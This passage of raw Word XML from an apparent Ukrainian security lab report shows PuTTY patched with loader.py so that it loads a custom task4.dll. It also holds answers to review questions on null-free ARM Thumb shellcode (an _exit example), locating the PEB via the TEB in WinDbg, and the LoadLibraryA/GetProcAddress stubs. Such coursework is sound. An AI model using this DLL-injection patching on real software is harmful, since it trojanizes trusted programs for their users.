      <w:r w:rsidR="00B2612E" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>task4.dll</w:t>
      </w:r>
      <w:r w:rsidR="00860924" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A492604" w14:textId="12A1F69B" w:rsidR="006F1E8C" w:rsidRPr="00AC0348" w:rsidRDefault="006F1E8C" w:rsidP="007C7908">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Пропатчимо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>putty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>а допомогою</w:t>
      </w:r>
      <w:r w:rsidR="00AC0348" w:rsidRPr="00AC0348">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC0348">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loader</w:t>
      </w:r>
      <w:r w:rsidR="00AC0348" w:rsidRPr="00AC0348">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B37E5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2F087" w14:textId="75D389FE" w:rsidR="00AC0348" w:rsidRPr="00A91B24" w:rsidRDefault="00AC0348" w:rsidP="007C7908">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91B24">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidR="00225E05" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00225E05" w:rsidRPr="00665C59">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python ../loader.py --exe putty.exe --dll task4.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E413E45" w14:textId="4190F391" w:rsidR="00EB5297" w:rsidRDefault="00EB5297" w:rsidP="007C7908">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70DCD49E" wp14:editId="183D6F03">
            <wp:extent cx="6645910" cy="615950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1847425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255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3FD8" w14:textId="129C39E4" w:rsidR="008862A7" w:rsidRPr="008862A7" w:rsidRDefault="008862A7" w:rsidP="007C7908">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустимо </w:t>
      </w:r>
      <w:r w:rsidRPr="00570C3A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>patched.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AF235" w14:textId="65EBC69F" w:rsidR="00A91B24" w:rsidRDefault="00627BE9" w:rsidP="007C7908">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="498DFD1F" wp14:editId="0C20020C">
            <wp:extent cx="6645910" cy="2152015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="100089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16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41EA" w14:textId="77777777" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="005619DF">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Контрольнi питання</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DE8CCC" w14:textId="77777777" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="00514002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1. У Linux ARM використовується виклик svc 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC18F8" w14:textId="77777777" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="00514002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>In [1]: from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6B80A" w14:textId="4FF481AD" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="00514002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>In [2]: context.clear(arch=</w:t>
      </w:r>
      <w:r w:rsidR="00B062F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>arm</w:t>
      </w:r>
      <w:r w:rsidR="00B062F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F183A" w14:textId="115D8476" w:rsidR="005619DF" w:rsidRPr="00EC0CCC" w:rsidRDefault="005619DF" w:rsidP="00514002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>In [3]: print(disasm(asm(</w:t>
      </w:r>
      <w:r w:rsidR="00B062F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>svc 0</w:t>
      </w:r>
      <w:r w:rsidR="00B062F0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C10C36" w14:textId="3059B471" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="00514002">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">0: </w:t>
      </w:r>
      <w:r w:rsidR="00F6276A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ef000000 svc 0x00000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE54B9" w14:textId="77777777" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="000A0809">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Чи можливо побудувати шеллкод без нульових символiв?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5526B6A1" w14:textId="3F16AF4C" w:rsidR="00665EA4" w:rsidRPr="00257232" w:rsidRDefault="000A0809" w:rsidP="005619DF">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Так, </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidRPr="003E7789">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>можливо</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B25157">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Треба </w:t>
      </w:r>
      <w:r w:rsidR="00514002">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>увійти в</w:t>
      </w:r>
      <w:r w:rsidR="00B25157">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> режим </w:t>
      </w:r>
      <w:r w:rsidR="00B25157">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thumb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B25157">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та </w:t>
      </w:r>
      <w:r w:rsidR="00EF19FE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">використовувати </w:t>
      </w:r>
      <w:r w:rsidR="00B25157" w:rsidRPr="00CE0DBE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00B25157">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>svc</w:t>
      </w:r>
      <w:r w:rsidR="00B25157" w:rsidRPr="00CE0DBE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1": </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87334B" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339AD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# Thumb-Mode on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7C44D" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="005339A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r6, pc, #</w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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</w:p>
    <w:p w14:paraId="7AC281C8" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339AD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x</w:t>
      </w:r>
      <w:r w:rsidRPr="005339A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r6  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F9BE42" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339A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.code   </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204B356" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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5960970C" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339AD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# _exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F9906" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339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ub</w:t>
      </w:r>
      <w:r w:rsidRPr="005339A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r4, r4, r4 </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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# r4 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE6A13" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339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5339A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r0, r4     </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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# r0 = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09682E27" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339AD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</w:t>
      </w:r>
      <w:r w:rsidRPr="005339A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r7, $0x1   </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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# r7 = 1: syscall number of _exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBF3A13" w14:textId="77777777" w:rsidR="005339AD" w:rsidRPr="005339AD" w:rsidRDefault="005339AD" w:rsidP="005339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339A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svc </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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5339AD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             </w:t>
      </w:r>
      <w:r w:rsidRPr="005339AD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# syscall by number which is stored in r7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A28D6A" w14:textId="2EF172D9" w:rsidR="00B25157" w:rsidRDefault="00724EBB" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Компілювати треба </w:t>
      </w:r>
      <w:r w:rsidR="00130420">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">з прапором </w:t>
      </w:r>
      <w:r w:rsidR="00130420" w:rsidRPr="00757F4A">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00130420">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mthumb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3191F848" w14:textId="172F0F4C" w:rsidR="00724EBB" w:rsidRPr="00AD3092" w:rsidRDefault="00F443E6" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD3092">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD3092">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as -mthumb -o write.o write.s &amp;&amp; ld -o write write.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F558FA" w14:textId="77777777" w:rsidR="002A00D7" w:rsidRPr="008D3F89" w:rsidRDefault="002A00D7" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="740526A1" w14:textId="787495D6" w:rsidR="005619DF" w:rsidRPr="005619DF" w:rsidRDefault="005619DF" w:rsidP="007C2A81">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2. Як знайти значення gs:[0x60] у WinDbg x64?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462FB1ED" w14:textId="46C7DF85" w:rsidR="00617E1F" w:rsidRPr="00ED43FC" w:rsidRDefault="00F35913" w:rsidP="00617E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Значення </w:t>
      </w:r>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">gs:[0x60] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">можна знайти </w:t>
      </w:r>
      <w:r w:rsidR="000628B3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r w:rsidR="00617E1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidR="00617E1F" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00617E1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidR="00617E1F" w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00617E1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
      <w:r w:rsidR="00617E1F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00617E1F" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00617E1F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidR="00617E1F" w:rsidRPr="00072187">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00035BE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC9A1CC" w14:textId="77777777" w:rsidR="00617E1F" w:rsidRPr="00ED43FC" w:rsidRDefault="00617E1F" w:rsidP="00617E1F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED43FC">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED43FC">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>!_</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED43FC">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE459E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> @$</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED43FC">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>teb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850DAA4" w14:textId="77777777" w:rsidR="00617E1F" w:rsidRDefault="00617E1F" w:rsidP="00617E1F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F1AD98C" wp14:editId="2418C99F">
            <wp:extent cx="5980952" cy="1828571"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="570747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301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8EEC" w14:textId="4D386716" w:rsidR="00617E1F" w:rsidRDefault="00617E1F" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="0027013C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Block</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00257232">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00257232">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidR="00257232">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00257232">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">знаходиться за офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">60 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">від початку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EF9AB" w14:textId="77777777" w:rsidR="008106AA" w:rsidRDefault="008106AA" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE0CD0B" w14:textId="2CF48A00" w:rsidR="005619DF" w:rsidRDefault="005619DF" w:rsidP="00C1733B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005619DF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3. Що таке KERNEL32!LoadLibraryAStub, KERNEL32!GetProcAddressStub?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C68561F" w14:textId="7A306FB8" w:rsidR="00305E66" w:rsidRPr="005619DF" w:rsidRDefault="00305E66" w:rsidP="005619DF">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">LoadLibraryAStub та GetProcAddressStub </w:t>
      </w:r>
      <w:r w:rsidR="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">обгортки </w:t>
      </w:r>
      <w:r w:rsidR="00043E62" w:rsidRPr="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00043E62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wrapper</w:t>
      </w:r>
      <w:r w:rsidR="005E3BDE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00043E62" w:rsidRPr="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">для функцій </w:t>
      </w:r>
      <w:r w:rsidR="008B6CB3" w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="008B6CB3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r w:rsidR="008B6CB3" w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r w:rsidR="006C0FA1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E422D5" w:rsidRPr="00E422D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Stub</w:t>
      </w:r>
      <w:r w:rsidR="00E422D5" w:rsidRPr="00043E62">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00305E66">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
